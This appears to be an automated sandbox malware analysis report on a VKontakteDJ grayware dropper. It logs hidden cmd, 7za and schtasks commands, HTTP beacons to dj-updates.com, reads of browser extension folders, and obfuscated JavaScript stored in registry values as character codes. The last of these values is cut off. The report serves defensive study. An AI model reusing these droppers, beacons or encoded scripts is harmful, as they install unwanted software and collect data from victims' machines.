11.6
0-day

b689ae97d5a8f52898634e98192f334865d1ad9784e990d23d12fe607c781624

584a90a46491964a7b5c09e0558bb2e9.exe

分析耗时

104s

最近分析

文件大小

9.1MB
静态报毒 动态报毒 A VARIANT OF JS AGEN AI SCORE=88 ATTRIBUTE BSCOPE CMRTAZPH3U5+9T5XCKSGLXKPJEDX GENERICRXJS GENETIC GRAYWARE HEDRRA HELPER HIGH CONFIDENCE HIGHCONFIDENCE MEDIADRUGPMF PUPX R325967 RDMK S11139230 ULISE VKDJ VKONTAKTE VKONTAKTEDJ WACATAC 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee GenericRXJS-EQ!584A90A46491 20200413 6.0.6.653
Alibaba 20190527 0.3.0.5
Avast Win32:PUPX-gen [PUP] 20200412 18.4.3895.0
Baidu 20190318 1.0.0.2
Kingsoft 20200413 2013.8.14.323
Tencent 20200413 1.0.0.1
CrowdStrike 20190702 1.0
静态指标
Queries for the computername (29 个事件)
Time & API Arguments Status Return Repeated
1620784384.285875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784387.535875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784387.722875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784389.503875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784389.581875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784393.222875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784393.394875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.253875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.613875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.628875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.644875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.660875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.785875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.800875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784394.831875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.206875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.222875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.253875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.285875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.300875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.331875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.347875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.378875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.441875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.472875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.503875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.535875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.675875
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1620784399.37825
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Command line console output was observed (20 个事件)
Time & API Arguments Status Return Repeated
1620784379.6445
WriteConsoleW
buffer: hi
console_handle: 0x00000007
success 1 0
1620784381.5505
WriteConsoleW
buffer: hi
console_handle: 0x00000007
success 1 0
1620784397.06625
WriteConsoleW
buffer: 系统找不到指定的文件。
console_handle: 0x0000000b
success 1 0
1620784397.51925
WriteConsoleA
buffer: 7-Zip (a) 19.00 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21
console_handle: 0x00000007
success 1 0
1620784397.53525
WriteConsoleA
buffer: Scanning the drive for archives:
console_handle: 0x00000007
success 1 0
1620784397.53525
WriteConsoleA
buffer: 0M Scan C:\ProgramData\
console_handle: 0x00000007
success 1 0
1620784397.53525
WriteConsoleA
buffer: 1 file, 4583156 bytes (4476 KiB)
console_handle: 0x00000007
success 1 0
1620784397.53525
WriteConsoleA
buffer: Extracting archive:
console_handle: 0x00000007
success 1 0
1620784397.53525
WriteConsoleA
buffer: C:\ProgramData\s111yt.zip
console_handle: 0x00000007
success 1 0
1620784397.55025
WriteConsoleA
buffer: Path
console_handle: 0x00000007
success 1 0
1620784397.55025
WriteConsoleA
buffer: C:\ProgramData\s111yt.zip
console_handle: 0x00000007
success 1 0
1620784397.55025
WriteConsoleA
buffer: Type
console_handle: 0x00000007
success 1 0
1620784397.55025
WriteConsoleA
buffer: zip
console_handle: 0x00000007
success 1 0
1620784397.55025
WriteConsoleA
buffer: Physical Size
console_handle: 0x00000007
success 1 0
1620784397.75325
WriteConsoleA
buffer: Everything is Ok
console_handle: 0x00000007
success 1 0
1620784397.75325
WriteConsoleA
buffer: Size:
console_handle: 0x00000007
success 1 0
1620784397.75325
WriteConsoleA
buffer: Compressed:
console_handle: 0x00000007
success 1 0
1620784398.738
WriteConsoleW
buffer: 移动了  1 个目录。
console_handle: 0x00000007
success 1 0
1620784399.39425
WriteConsoleW
buffer: 错误:
console_handle: 0x0000000b
success 1 0
1620784399.39425
WriteConsoleW
buffer: 系统找不到指定的文件。
console_handle: 0x0000000b
success 1 0
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1620784382.23875
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section .didata
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 个事件)
suspicious_features GET method with no useragent header suspicious_request GET http://dj-updates.com//stat.counter/?app=vkdj&c1=cinst_start_Windows%207%20x64_av-clean&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg==&uid=
suspicious_features GET method with no useragent header suspicious_request GET http://dj-updates.com//client.config/?app=vk_downloader&format=xml&uid=B2785848-06A1-417E-B3B0-0692D6A8C0E8-E2A6769EA3FB4B6D6A1B3FEB3384FF4F&version=1.7.1.153&w_info=cl_downloader&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg==
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:961693851&cup2hreq=eab5207369b7314da738452c2ac02e10b75fb366b44b3d57b2a0725d4ab37040
Performs some HTTP requests (6 个事件)
request GET http://dj-updates.com//stat.counter/?app=vkdj&c1=cinst_start_Windows%207%20x64_av-clean&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg==&uid=
request GET http://dj-updates.com//client.config/?app=vk_downloader&format=xml&uid=B2785848-06A1-417E-B3B0-0692D6A8C0E8-E2A6769EA3FB4B6D6A1B3FEB3384FF4F&version=1.7.1.153&w_info=cl_downloader&advert_key=ZWMwMDAxMDVhMzAwMTljYzAwMDAxOWJmMDAxOWJmMDAxOWJmZGUwMGM4ODMyNg==
request HEAD http://redirector.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe
request HEAD http://r1---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?cms_redirect=yes&mh=ms&mip=202.100.214.100&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620755296&mv=m&mvi=1&pl=23&shardbypass=yes
request HEAD http://r3---sn-j5o7dn7e.gvt1.com/edgedl/release2/update2/AIUdiWYcaIvMz1IBNCM0PPo_1.3.36.82/GoogleUpdateSetup.exe?mh=ms&pl=17&shardbypass=yes&redirect_counter=1&rm=sn-j5ok7e&req_id=253465646a23305e&cms_redirect=yes&ipbypass=yes&mip=59.50.85.19&mm=28&mn=sn-j5o7dn7e&ms=nvh&mt=1620755296&mv=m&mvi=3
request POST https://update.googleapis.com/service/update2?cup2key=10:961693851&cup2hreq=eab5207369b7314da738452c2ac02e10b75fb366b44b3d57b2a0725d4ab37040
Sends data using the HTTP POST Method (1 个事件)
request POST https://update.googleapis.com/service/update2?cup2key=10:961693851&cup2hreq=eab5207369b7314da738452c2ac02e10b75fb366b44b3d57b2a0725d4ab37040
Allocates read-write-execute memory (usually to unpack itself) (1 个事件)
Time & API Arguments Status Return Repeated
1620784378.76975
NtAllocateVirtualMemory
process_identifier: 1916
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x01140000
success 0 0
Steals private information from local Internet browsers (9 个事件)
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmelgafobnkionkmolbpeinpgefobndm
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnomeoannjmahmmmgpckeigjcmoioea
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ppiaojpbclpegkkkmikabinlpbahhbha
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\fdjdjkkjoiomafnihnobkinnfjnnlhdg
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\djgdgdcfmdkficbifbnaacknblbkhhoc
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\ifbelakdiigbhajfdkjccemmmbdlbifg
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\nlmophpcjeihmbejobmmkoghokakinne
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\bgepjdjmkimgmfhddapeafignhjnpghc
file C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Extensions\akgdkknilkblpjcgpjmbjgpamneokmag
Creates executable files on the filesystem (5 个事件)
file C:\ProgramData\duwud\7zxa.dll
file C:\ProgramData\duwud\7za.dll
file C:\ProgramData\kx2m59\VKontakteDJ.exe
file C:\ProgramData\fprupafhnc.js
file C:\ProgramData\duwud\7za.exe
Creates a shortcut to an executable file (1 个事件)
file C:\Users\Administrator\Desktop\Game Of Thrones Winter is coming.lnk
Creates a suspicious process (5 个事件)
cmdline "C:\Windows\System32\schtasks.exe" /Delete /TN VK_DJ /F
cmdline SCHTASKS /Delete /TN VK_DJ /F
cmdline "C:\Windows\System32\cmd.exe" /c move /Y "C:\ProgramData\kx2m59" "C:\ProgramData\VkontakteDJ"
cmdline cmd.exe /c move /Y "C:\ProgramData\kx2m59" "C:\ProgramData\VkontakteDJ"
cmdline "C:\Windows\System32\cmd.exe" /c rd /S/Q C:\ProgramData\kx2m59
A process created a hidden window (4 个事件)
Time & API Arguments Status Return Repeated
1620784396.863875
ShellExecuteExW
parameters: /c rd /S/Q C:\ProgramData\kx2m59
filepath: cmd
filepath_r: cmd
show_type: 0
success 1 0
1620784397.363875
ShellExecuteExW
parameters: e C:\ProgramData\s111yt.zip -pvkd -y -oC:\ProgramData\kx2m59
filepath: C:\ProgramData\duwud\7za.exe
filepath_r: C:\ProgramData\duwud\7za.exe
show_type: 0
success 1 0
1620784398.456875
ShellExecuteExW
parameters: /c move /Y "C:\ProgramData\kx2m59" "C:\ProgramData\VkontakteDJ"
filepath: cmd.exe
filepath_r: cmd.exe
show_type: 0
success 1 0
1620784399.191875
ShellExecuteExW
parameters: /Delete /TN VK_DJ /F
filepath: SCHTASKS
filepath_r: SCHTASKS
show_type: 0
success 1 0
The binary likely contains encrypted or compressed data indicative of a packer (2 个事件)
entropy 7.867656194438293 section {'size_of_data': '0x0070b200', 'virtual_address': '0x0020d000', 'entropy': 7.867656194438293, 'name': '.rsrc', 'virtual_size': '0x0070c000'} description A section with a high entropy has been found
entropy 0.7717205221485127 description Overall entropy of this PE file is high
Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 个事件)
Time & API Arguments Status Return Repeated
1620784397.51925
LookupPrivilegeValueW
system_name:
privilege_name: SeRestorePrivilege
success 1 0
1620784397.53525
LookupPrivilegeValueW
system_name:
privilege_name: SeSecurityPrivilege
success 1 0
1620784397.53525
LookupPrivilegeValueW
system_name:
privilege_name: SeSecurityPrivilege
success 1 0
Uses Windows utilities for basic Windows functionality (2 个事件)
cmdline "C:\Windows\System32\schtasks.exe" /Delete /TN VK_DJ /F
cmdline SCHTASKS /Delete /TN VK_DJ /F
网络通信
Communicates with host for which no DNS query was performed (2 个事件)
host 172.217.24.14
host 203.208.41.66
Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config (6 个事件)
Time & API Arguments Status Return Repeated
1620784387.44175
RegSetValueExW
key_handle: 0x00000124
value: S116S114S121S123S118S97S114S32S114S101S115S32S61S32S102S105S108S116S101S114S70S117S110S99S40S71S101S116S80S114S111S99S101S115S115S78S97S109S101S40S41S41S59S118S97S114S32S102S105S110S32S61S32S39S39S59S105S102S40S114S101S115S46S108S101S110S103S116S104S32S61S61S32S49S32S38S38S32S114S101S115S91S48S93S46S105S110S100S101S120S79S102S40S39S65S112S112S68S97S116S97S92S92S76S111S99S97S108S92S92S84S101S109S112S39S41S32S33S61S32S45S49S41S123S102S105S110S32S61S32S39S45S49S39S59S125S101S108S115S101S123S102S105S110S32S61S32S39S48S39S59S125S102S105S110S59S102S117S110S99S116S105S111S110S32S71S101S116S80S114S111S99S101S115S115S78S97S109S101S40S41S123S118S97S114S32S112S114S111S99S101S115S115S32S61S32S91S93S59S118S97S114S32S108S111S99S32S32S32S61S32S110S101S119S32S65S99S116S105S118S101S88S79S98S106S101S99S116S40S39S87S98S101S109S83S99S114S105S112S116S105S110S103S46S83S87S98S101S109S76S111S99S97S116S111S114S39S41S59S118S97S114S32S115S118S99S32S32S32S61S32S108S111S99S46S67S111S110S110S101S99S116S83S101S114S118S101S114S40S39S46S39S44S32S39S114S111S111S116S92S92S99S105S109S118S50S39S41S59S99S111S108S108S32S32S32S32S32S32S61S32S115S118S99S46S69S120S101S99S81S117S101S114S121S40S39S115S101S108S101S99S116S32S42S32S102S114S111S109S32S87S105S110S51S50S95S80S114S111S99S101S115S115S39S41S59S118S97S114S32S105S116S101S109S115S32S61S32S110S101S119S32S69S110S117S109S101S114S97S116S111S114S40S99S111S108S108S41S59S119S104S105S108S101S32S40S33S105S116S101S109S115S46S97S116S69S110S100S40S41S41S123S112S114S111S99S101S115S115S46S112S117S115S104S40S105S116S101S109S115S46S105S116S101S109S40S41S46S69S120S101S99S117S116S97S98S108S101S80S97S116S104S41S59S105S116S101S109S115S46S109S111S118S101S78S101S120S116S40S41S59S125S114S101S116S117S114S110S32S112S114S111S99S101S115S115S59S125S102S117S110S99S116S105S111S110S32S102S105S108S116S101S114S70S117S110S99S40S97S114S114S97S121S41S123S118S97S114S32S97S114S114S97S121S82S101S115S117S108S116S32S61S32S91S93S59S118S97S114S32S97S114S114S97S121S70S111S114S70S105S110S100S32S61S32S91S39S83S121S115S116S101S109S32S73S100S108S101S32S80S114S111S99S101S115S115S39S44S39S83S121S115S116S101S109S39S44S39S115S109S115S115S46S101S120S101S39S44S39S99S115S114S115S115S46S101S120S101S39S44S39S119S105S110S105S110S105S116S46S101S120S101S39S44S39S99S115S114S115S115S46S101S120S101S39S44S39S119S105S110S108S111S103S111S110S46S101S120S101S39S44S39S115S101S114S118S105S99S101S115S46S101S120S101S39S44S39S108S115S97S115S115S46S101S120S101S39S44S39S108S115S109S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S100S119S109S46S101S120S101S39S44S39S101S120S112S108S111S114S101S114S46S101S120S101S39S44S39S116S97S115S107S104S111S115S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S83S101S97S114S99S104S73S110S100S101S120S101S114S46S101S120S101S39S44S39S83S101S97S114S99S104S80S114S111S116S111S99S111S108S72S111S115S116S46S101S120S101S39S44S39S83S101S97S114S99S104S70S105S108S116S101S114S72S111S115S116S46S101S120S101S39S44S39S83S101S97S114S99S104S80S114S111S116S111S99S111S108S72S111S115S116S46S101S120S101S39S44S39S116S97S115S107S104S111S115S116S46S101S120S101S39S44S39S119S115S99S114S105S112S116S46S101S120S101S39S44S39S115S118S99S104S111S115S116S46S101S120S101S39S44S39S87S109S105S80S114S118S83S69S46S101S120S101S39S44S39S109S115S102S101S101S100S115S115S121S110S99S46S101S120S101S39S93S59S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S97S121S46S108S101S110S103S116S104S59S105S43S43S41S123S102S111S114S40S118S97S114S32S99S32S61S32S48S59S32S99S32S60S32S97S114S114S97S121S70S111S114S70S105S110S100S46S108S101S110S103S116S104S59S99S43S43S41S123S105S102S40S97S114S114S97S121S91S105S93S32S61S61S32S110S117S108S108S32S124S124S32S97S114S114S97S121S91S105S93S46S105S110S100S101S120S79S102S40S97S114S114S97S121S70S111S114S70S105S110S100S91S99S93S41S32S33S61S32S45S49S41S123S97S114S114S97S121S91S105S93S32S61S32S39S39S59S125S125S125S102S111S114S40S118S97S114S32S105S32S61S32S48S59S105S32S60S32S97S114S114S97S121S46S108S101S110S103S116S104S59S105S43S43S41S123S105S102S40S97S114S114S97S121S91S105S93S32S33S61S32S39S39S41S123S97S114S114S97S121S82S101S115S117S108S116S46S112S117S115S104S40S97S114S114S97S121S91S105S93S41S59S125S125S114S101S116S117S114S110S32S97S114S114S97S121S82S101S115S117S108S116S59S125S125S99S97S116S99S104S40S101S114S114S41S123S101S114S114S46S100S101S115S99S114S105S112S116S105S111S110S59S125S
regkey_r: dataIn
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\VKDJ\dataIn
success 0 0
1620784390.87875
RegSetValueExW
key_handle: 0x00000304
value: S116S114S121S123S77S68S53S40S39S71S101S116S80S114S111S103S114S97S109S73S110S102S111S66S50S55S56S53S56S52S56S45S48S54S65S49S45S52S49S55S69S45S66S51S66S48S45S48S54S57S50S68S54S65S56S67S48S69S56S39S41S59S32S102S117S110S99S116S105S111S110S32S77S68S53S40S100S41S123S114S101S115S117S108S116S32S61S32S77S40S86S40S89S40S88S40S100S41S44S56S42S100S46S108S101S110S103S116S104S41S41S41S59S114S101S116S117S114S110S32S114S101S115S117S108S116S46S116S111S76S111S99S97S108S101S85S112S112S101S114S67S97S115S101S40S41S125S59S102S117S110S99S116S105S111S110S32S77S40S100S41S123S102S111S114S40S118S97S114S32S95S44S109S61S39S48S49S50S51S52S53S54S55S56S57S65S66S67S68S69S70S39S44S102S61S39S39S44S114S61S48S59S114S60S100S46S108S101S110S103S116S104S59S114S43S43S41S95S61S100S46S99S104S97S114S67S111S100S101S65S116S40S114S41S44S102S43S61S109S46S99S104S97S114S65S116S40S95S62S62S62S52S38S49S53S41S43S109S46S99S104S97S114S65S116S40S49S53S38S95S41S59S114S101S116S117S114S110S32S102S125S102S117S110S99S116S105S111S110S32S88S40S100S41S123S102S111S114S40S118S97S114S32S95S61S65S114S114S97S121S40S100S46S108S101S110S103S116S104S62S62S50S41S44S109S61S48S59S109S60S95S46S108S101S110S103S116S104S59S109S43S43S41S95S91S109S93S61S48S59S102S111S114S40S109S61S48S59S109S60S56S42S100S46S108S101S110S103S116S104S59S109S43S61S56S41S95S91S109S62S62S53S93S124S61S40S50S53S53S38S100S46S99S104S97S114S67S111S100S101S65S116S40S109S47S56S41S41S60S60S109S37S51S50S59S114S101S116S117S114S110S32S95S125S102S117S110S99S116S105S111S110S32S86S40S100S41S123S102S111S114S40S118S97S114S32S95S61S39S39S44S109S61S48S59S109S60S51S50S42S100S46S108S101S110S103S116S104S59S109S43S61S56S41S95S43S61S83S116S114S105S110S103S46S102S114S111S109S67S104S97S114S67S111S100S101S40S100S91S109S62S62S53S93S62S62S62S109S37S51S50S38S50S53S53S41S59S114S101S116S117S114S110S32S95S125S102S117S110S99S116S105S111S110S32S89S40S100S44S95S41S123S100S91S95S62S62S53S93S124S61S49S50S56S60S60S95S37S51S50S44S100S91S49S52S43S40S95S43S54S52S62S62S62S57S60S60S52S41S93S61S95S59S102S111S114S40S118S97S114S32S109S61S49S55S51S50S53S56S52S49S57S51S44S102S61S45S50S55S49S55S51S51S56S55S57S44S114S61S45S49S55S51S50S53S56S52S49S57S52S44S105S61S50S55S49S55S51S51S56S55S56S44S110S61S48S59S110S60S100S46S108S101S110S103S116S104S59S110S43S61S49S54S41S123S118S97S114S32S104S61S109S44S116S61S102S44S103S61S114S44S101S61S105S59S102S61S109S100S53S95S105S105S40S102S61S109S100S53S95S105S105S40S102S61S109S100S53S95S105S105S40S102S61S109S100S53S95S105S105S40S102S61S109S100S53S95S104S104S40S102S61S109S100S53S95S104S104S40S102S61S109S100S53S95S104S104S40S102S61S109S100S53S95S104S104S40S102S61S109S100S53S95S103S103S40S102S61S109S100S53S95S103S103S40S102S61S109S100S53S95S103S103S40S102S61S109S100S53S95S103S103S40S102S61S109S100S53S95S102S102S40S102S61S109S100S53S95S102S102S40S102S61S109S100S53S95S102S102S40S102S61S109S100S53S95S102S102S40S102S44S114S61S109S100S53S95S102S102S40S114S44S105S61S109S100S53S95S102S102S40S105S44S109S61S109S100S53S95S102S102S40S109S44S102S44S114S44S105S44S100S91S110S43S48S93S44S55S44S45S54S56S48S56S55S54S57S51S54S41S44S102S44S114S44S100S91S110S43S49S93S44S49S50S44S45S51S56S57S53S54S52S53S56S54S41S44S109S44S102S44S100S91S110S43S50S93S44S49S55S44S54S48S54S49S48S53S56S49S57S41S44S105S44S109S44S100S91S110S43S51S93S44S50S50S44S45S49S48S52S52S53S50S53S51S51S48S41S44S114S61S109S100S53S95S102S102S40S114S44S105S61S109S100S53S95S102S102S40S105S44S109S61S109S100S53S95S102S102S40S109S44S102S44S114S44S105S44S100S91S110S43S52S93S44S55S44S45S49S55S54S52S49S56S56S57S55S41S44S102S44S114S44S100S91S110S43S53S93S44S49S50S44S49S50S48S48S48S56S48S52S50S54S41S44S109S44S102S44S100S91S110S43S54S93S44S49S55S44S45S49S52S55S51S50S51S49S51S52S49S41S44S105S44S109S44S100S91S110S43S55S93S44S50S50S44S45S52S53S55S48S53S57S56S51S41S44S114S61S109S100S53S95S102S102S40S114S44S105S61S109S100S53S95S102S102S40S105S44S109S61S109S100S53S95S102S102S40S109S44S102S44S114S44S105S44S100S91S110S43S56S93S44S55S44S49S55S55S48S48S51S53S52S49S54S41S44S102S44S114S44S100S91S110S43S57S93S44S49S50S44S45S49S57S53S56S52S49S52S52S49S55S41S44S109S44S102S44S100S91S110S43S49S48S93S44S49S55S44S45S52S50S48S54S51S41S44S105S44S109S44S100S91S110S43S49S49S93S44S50S50S44S45S49S57S57S48S52S48S52S49S54S50S41S44S114S61S109S100S53S95S102S102S40S114S44S105S61S109S100S53S95S102S102S40S105S44S109S61S109S100S53S95S102S102S40S109S44S102S44S114S44S105S44S100S91S110S43S49S50S93S44S55S44S49S56S48S52S54S48S51S54S56S50S41S44S102S44S114S44S100S91S110S43S49S51S93S44S49S50S44S45S52S48S51S52S49S49S48S49S41S44S109S44S102S44S100S91S110S43S49S52S93S44S49S55S44S45S49S53S48S50S48S48S50S50S57S48S41S44S105S44S109S44S100S91S110S43S49S53S93S44S50S50S44S49S50S51S54S53S51S53S51S50S57S41S44S114S61S109S100S53S95S103S103S40S114S44S105S61S109S100S53S95S103S103S40S105S44S109S61S109S100S53S95S103S103S40S109S44S102S44S114S44S105S44S100S91S110S43S49S93S44S53S44S45S49S54S53S55S57S54S53S49S48S41S44S102S44S114S44S100S91S110S43S54S93S44S57S44S45S49S48S54S57S53S48S49S54S51S50S41S44S109S44S102S44S100S91S110S43S49S49S93S44S49S52S44S54S52S51S55S49S55S55S49S51S41S44S105S44S109S44S100S91S110S43S48S93S44S50S48S44S45S51S55S51S56S57S55S51S48S50S41S44S114S61S109S100S53S95S103S103S40S114S44S105S61S109S100S53S95S103S103S40S105S44S109S61S109S100S53S95S103S103S40S109S44S102S44S114S44S105S44S100S91S110S43S53S93S44S53S44S45S55S48S49S53S53S56S54S57S49S41S44S102S44S114S44S100S91S110S43S49S48S93S44S57S44S51S56S48S49S54S48S56S51S41S44S109S44S102S44S100S91S110S43S49S53S93S44S49S52S44S45S54S54S48S52S55S56S51S51S53S41S44S105S44S109S44S100S91S110S43S52S93S44S50S48S44S45S52S48S53S53S51S55S56S52S56S41S44S114S61S109S100S53S95S103S103S40S114S44S105S61S109S100S53S95S103S103S40S105S44S109S61S109S100S53S95S103S103S40S109S44S102S44S114S44S105S44S100S91S110S43S57S93S44S53S44S53S54S56S52S52S54S52S51S56S41S44S102S44S114S44S100S91S110S43S49S52S93S44S57S44S45S49S48S49S57S56S48S51S54S57S48S41S44S109S44S102S44S100S91S110S43S51S93S44S49S52S44S45S49S56S55S51S54S51S57S54S49S41S44S105S44S109S44S100S91S110S43S56S93S44S50S48S44S49S49S54S51S53S51S49S53S48S49S41S44S114S61S109S100S53S95S103S103S40S114S44S105S61S109S100S53S95S103S103S40S105S44S109S61S109S100S53S95S103S103S40S109S44S102S44S114S44S105S44S100S91S110S43S49S51S93S44S53S44S45S49S52S52S52S54S56S49S52S54S55S41S44S102S44S114S44S100S91S110S43S50S93S44S57S44S45S53S49S52S48S51S55S56S52S41S44S109S44S102S44S100S91S110S43S55S93S44S49S52S44S49S55S51S53S51S50S56S52S55S51S41S44S105S44S109S44S100S91S110S43S49S50S93S44S50S48S44S45S49S57S50S54S54S48S55S55S51S52S41S44S114S61S109S100S53S95S104S104S40S114S44S105S61S109S100S53S95S104S104S40S105S44S109S61S109S100S53S95S104S104S40S109S44S102S44S114S44S105S44S100S91S110S43S53S93S44S52S44S45S51S55S56S53S53S56S41S44S102S44S114S44S100S91S110S43S56S93S44S49S49S44S45S50S48S50S50S53S55S52S52S54S51S41S44S109S44S102S44S100S91S110S43S49S49S93S44S49S54S44S49S56S51S57S48S51S48S53S54S50S41S44S105S44S109S44S100S91S110S43S49S52S93S44S50S51S44S45S51S53S51S48S57S53S53S54S41S44S114S61S109S100S53S95S104S104S40S114S44S105S61S109S100S53S95S104S104S40S105S44S109S61S109S100S53S95S104S104S40S109S44S102S44S114S44S105S44S100S91S110S43S49S93S44S52S44S45S49S53S51S48S57S57S50S48S54S48S41S44S102S44S114S44S100S91S110S43S52S93S44S49S49S44S49S50S55S50S56S57S51S51S53S51S41S44S109S44S102S44S100S91S110S43S55S93S44S49S54S44S45S49S53S53S52S57S55S54S51S50S41S44S105S44S109S44S100S91S110S43S49S48S93S44S50S51S44S45S49S48S57S52S55S51S48S54S52S48S41S44S114S61S109S100S53S95S104S104S40S114S44S105S61S109S100S53S95S104S104S40S105S44S109S61S109S100S53S95S104S104S40S109S44S102S44S114S44S105S44S100S91S110S43S49S51S93S44S52S44S54S56S49S50S55S57S49S55S52S41S44S102S44S114S44S100S91S110S43S48S93S44S49S49S44S45S51S53S56S53S51S55S50S50S50S41S44S109S44S102S44S100S91S110S43S51S93S44S49S54S44S45S55S50S50S53S50S49S57S55S57S41S44S105S44S109S44S100S91S110S43S54S93S44S50S51S44S55S54S48S50S57S49S56S57S41S44S114S61S109S100S53S95S104S104S40S114S44S105S61S109S100S53S95S104S104S40S105S44S109S61S109S100S53S95S104S104S40S109S44S102S44S114S44S105S44S100S91S110S43S57S93S44S52S44S45S54S52S48S51S54S52S52S56S55S41S44S102S44S114S44S100S91S110S43S49S50S93S44S49S49S44S45S52S50S49S56S49S53S56S51S53S41S44S109S44S102S44S100S91S110S43S49S53S93S44S49S54S44S53S51S48S55S52S50S53S50S48S41S44S105S44S109S44S100S91S110S43S50S93S44S50S51S44S45S57S57S53S51S51S56S54S53S49S41S44S114S61S109S100S53S95S105S105S40S114S44S105S61S109S100S53S95S105S105S40S105S44S109S61S109S100S53S95S105S105S40S109S44S102S44S114S44S105S44S100S91S110S43S48S93S44S54S44S45S49S57S56S54S51S48S56S52S52S41S44S102S44S114S44S100S91S110S43S55S93S44S49S48S44S49S49S50S54S56S57S49S52S49S53S41S44S109S44S102S44S100S91S110S43S49S52S93S44S49S53S44S45S49S52S49S54S51S53S52S57S48S53S41S44S105S44S109S44S100S91S110S43S53S93S44S50S49S44S45S53S55S52S51S52S48S53S53S41S44S114S61S109S100S53S95S105S105S40S114S44S105S61S109S100S53S95S105S105S40S105S44S109S61S109S100S53S95S105S105S40S109S44S102S44S114S44S105S44S100S91S110S43S49S50S93S44S54S44S49S55S48S48S52S56S53S53S55S49S41S44S102S44S114S44S100S91S110S43S51S93S44S49S48S44S45S49S56S57S52S57S56S54S54S48S54S41S44S109S44S102S44S100S91S110S43S49S48S93S44S49S53S44S45S49S48S53S49S53S50S51S41S44S105S44S109S44S100S91S110S43S49S93S44S50S49S44S45S50S48S53S52S57S50S50S55S57S57S41S44S114S61S109S100S53S95S105S105S40S114S44S105S61S109S100S53S95S105S105S40S105S44S109S61S109S100S53S95S105S105S40S109S44S102S44S114S44S105S44S100S91S110S43S56S93S44S54S44S49S56S55S51S51S49S51S51S53S57S41S44S102S44S114S44S100S91S110S43S49S53S93S44S49S48S44S45S51S48S54S49S49S55S52S52S41S44S109S44S102S44S100S91S110S43S54S93S44S49S53S44S45S49S53S54S48S49S57S56S51S56